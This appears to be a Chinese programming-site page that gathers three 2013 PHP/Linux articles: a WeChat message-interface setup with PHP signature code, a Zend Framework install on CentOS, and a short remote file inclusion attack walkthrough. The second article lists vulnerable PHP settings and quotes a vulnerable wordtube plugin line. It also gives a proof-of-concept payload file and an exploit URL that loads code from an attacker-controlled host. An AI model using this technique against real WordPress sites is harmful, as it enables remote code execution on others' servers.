微信公众平台消息接口开发（...-修改部分php配置实现远程包...-Linux(CentOS)下安装Zend Framework

当前位置: 编程技术>php

本页文章导读:

▪微信公众平台消息接口开发（1）启用接口微信平台消息接口启用作者：http://txw1958.cnblogs.com/ 本系统教程以微信公众平台应用天气神（账号WeatherGod）为例，讲解微信接口开发过程。欢迎大家关注该账号，二维码见底部图。使用.........

▪修改部分php配置实现远程包含攻击 1. 调试期间，可以打开display_errors = On2. 目标机使用了include、require或require_once3. 目标机配置　　a) register_globals = On　　b) allow_url_fopen = On　　c) allow_url_include = On这样的目标就可以进行攻击.........

▪Linux(CentOS)下安装Zend Framework 正所谓巧妇难为无米之炊。要安装Zend Framework必须先在Linux上配置好（LAMP）环境，这里作者用的是 Apache/2.2.15 (CentOS)，和SSH。好了，废话不多说，直接入主题。 Zend Framework.........

[1]微信公众平台消息接口开发（1）启用接口

来源: 发布时间: 2013-10-22

微信平台消息接口启用
作者：http://txw1958.cnblogs.com/

本系统教程以微信公众平台应用天气神（账号WeatherGod）为例，讲解微信接口开发过程。欢迎大家关注该账号，二维码见底部图。

使用前提条件：拥有一个公网上的HTTP服务器主机空间，具有创建目录、上传文件等权限。免费的也可以，但须有二级域名。

一、注册微信公平平台账号
地址：http://mp.weixin.qq.com/
过程略。

二、上传代码

以下代码是消息接口认证代码，将下列PHP代码保存为index.php(其中的mytoken改为你想要的的token名称)，并上传到HTTP服务器指定的目录中，

<?php

define("TOKEN", "mytoken");
$wechatObj = new wechatCallbackapiTest();
$wechatObj->valid();

class wechatCallbackapiTest
{
public function valid()
{
$echoStr = $_GET["echostr"]; //随机字符串

if($this->checkSignature()){
echo $echoStr;
exit;
}
}

private function checkSignature()
{
$signature = $_GET["signature"]; //微信加密签名
$timestamp = $_GET["timestamp"]; //时间戳
$nonce = $_GET["nonce"]; //随机数

$token = TOKEN;
$tmpArr = array($token, $timestamp, $nonce);
sort($tmpArr); //进行字典序排序

//sha1加密后与签名对比
if( sha1(implode($tmpArr)) == $signature ){
return true;
}else{
return false;
}
}
}

?>

或者直接下载微信的示例代码。地址 http://mp.weixin.qq.com/mpres/htmledition/res/wx_sample.zip

二、启用消息接口
进入微信公众平台，选择设置 - 关键词自动回复，选择启用，点击公众平台消息接口旁边的编辑，进入接口配置界面：
按照要求如实填写下列选项。特别注意是URL是你上传index.php的路径，必须以http://开头，且为80端口。

填好后点击提交，这会有两种结果
1. 服务器没有响应Token验证，这样回头检查一下各项配置是否正确。

2. 提交成功

恭喜你，配置成功了。

关注天气神（账号WeatherGod）方法：

1. 依次进入以下路径：朋友们—>添加朋友—>搜号码，输入WeatherGod，不区分大小写，点击查找，然后点击关注。

2. 扫描二维码：

本文链接

[2]修改部分php配置实现远程包含攻击

来源: 发布时间: 2013-10-22

1. 调试期间，可以打开display_errors = On

2. 目标机使用了include、require或require_once

3. 目标机配置

　　a) register_globals = On

　　b) allow_url_fopen = On

　　c) allow_url_include = On

这样的目标就可以进行攻击了

自己搭建简易的服务器，apache + php 即可

修改httpd.conf中，将后缀为php的，从而避免代码在攻击端就被执行，

#AddType application/x-httpd-php .php .html .htm

根据漏洞代码，生成对应的环境，例如：

if (!$_POST) $wppath=$_GET['wpPATH'];

else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');

我们就可以建立一个可访问的文件夹bad_guy,

增加读权限order allow,deny allow from all ，

然后在里面新建一个wp-config.php

<?php
mkdir('c:\exploit');
phpinfo();
exit;
?>

~然后请求一下就行了

/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy

来张效果图：

本文链接

[3]Linux(CentOS)下安装Zend Framework

来源: 发布时间: 2013-10-22

正所谓巧妇难为无米之炊。要安装Zend Framework必须先在Linux上配置好（LAMP）环境，这里作者用的是 Apache/2.2.15 (CentOS)，和SSH。好了，废话不多说，直接入主题。

Zend Framework官方下载地址：http://framework.zend.com/downloads/latest

让人纠结的是官网在12年下半年的时候还没有那么多条条框框，但是现在去down个框架包还得注册，最让人蛋疼的是注册的时候会问你是什么职业类别（Role），Developer和Architect下面居然有个“CEO”的选项，汗……

这里我直接用了之前在Windows系统down好的ZF，版本 1.11.12，zip后缀或者tar.gz都可以，直接上传到Linux服务器上，解压什么的就不赘述了~

好了，解压后得到的包，如下图：

cd 进入后：

接下来就跟windows下安装差不多了，只不过Windows下用的是zf.bat，而Linux下用的是zf.sh这个文件，还多一步——建立链接文件。

#cd bin，看到有以下几个文件：

开始建立链接文件：

这里新建的链接文件就相当于Windows下的快捷方式，注意建立的链接文件路径，个人建议最好放到当前bin目录下，后面操作起来方便。

建立链接文件成功之后，ls一下，我们看到生成了一个链接文件zf，指向当前目录下的zf.sh文件，哈哈~

接下来就是跟Windows一样的命令啦：

后面那个"newriver"就是你的Zend Framework的名字，这个自己定，命令执行完毕之后，到 /var/www/html 目录下查看：

newriver 已经存在，打开查看，Zend Framework骨架子弄好了，别忘了把解压包里 library 文件夹下的Zend 类库拷贝到 /var/www/html/newriver/library 下……

测试ZF是否已经安装好：

到Apache下配置好虚拟主机（注意配到newriver/public下），打开Apache rewrite module，httpd.conf 把AllowOverride None 改成All，PHP打开PDO扩展，改下客户机etc文件，不多说。

重启Apache

到客户机浏览器下打开 http://www.newriver.com/

OK，大功告成！

本文链接